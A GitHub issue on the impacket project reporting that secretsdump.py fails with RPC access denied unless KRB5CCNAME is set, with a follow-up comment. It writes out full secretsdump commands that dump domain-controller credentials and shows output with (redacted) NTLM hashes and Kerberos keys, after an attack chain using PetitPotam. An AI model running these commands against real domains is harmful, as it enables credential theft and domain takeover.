Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

RPC Access Denied - Except when KRB5CCNAME is set with anything #1674

Open
raithedavion opened this issue Jan 3, 2024 · 1 comment
Open

RPC Access Denied - Except when KRB5CCNAME is set with anything #1674

raithedavion opened this issue Jan 3, 2024 · 1 comment
Assignees
@anadrianmanrique
Labels
in review This issue or pull request is being analyzed

Comments

@raithedavion
Copy link
Contributor

raithedavion commented Jan 3, 2024
edited

Configuration

impacket version: v0.11.0
Python version: 3.11.4
Target OS: Kali

This does not work...

secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Exiting NTDSHashes.dump() because rpc_s_access_denied
[*] Cleaning up...

This does?

$ KRB5CCNAME=wtf.txt secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Saving output to ntdsdump
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for adminuser1 
[+] Calling DRSGetNCChanges for {50a0e1bd-9021-436c-accb-ffeaa0276702} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=adminuser1,OU=Admin Users,DC=example,DC=com
example.com\adminuser1:22773:aad3b435b51404eeaad3b435b51404ee:<redacted>:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
example.com\adminuser1:aes256-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:aes128-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:des-cbc-md5:<redacted>
[*] Cleaning up...

Additional context

Used petitpotam to get DC's NTLM hashes when went an tried to dump the domain. Trying to dump domain on this client failed, so tried -just-dc-user (rpc_access_denied). Tried just about everything including ticketer, and finally set the KRB5CCNAME and all of a sudden it just works using -just-dc-user.

Repeated the steps, I've set KRB5CCName to blank (export KRB5CCNAMe=) and set it to non-existent files, and blank files (wtf.txt above). For some reason, only with KRB5CCName is set will it dump this domain. I don't know the domain's exact setup so that could have something to do with it, but find it odd that KRB5CCName being set is the fix when using the NTLM hash.
@gabrielg5 gabrielg5 added the in review This issue or pull request is being analyzed label Jan 4, 2024
@Zamanry
Copy link

Zamanry commented Apr 29, 2024

I've encountered this issue. EDR on the DC is not triggering nor is any other prevention. No crazy RPC hardening has occurred either. I was unable to even get the -just-dc-user flag to work with a specific user.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@anadrianmanrique anadrianmanrique

Labels
in review This issue or pull request is being analyzed
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@gabrielg5 @raithedavion @Zamanry @anadrianmanrique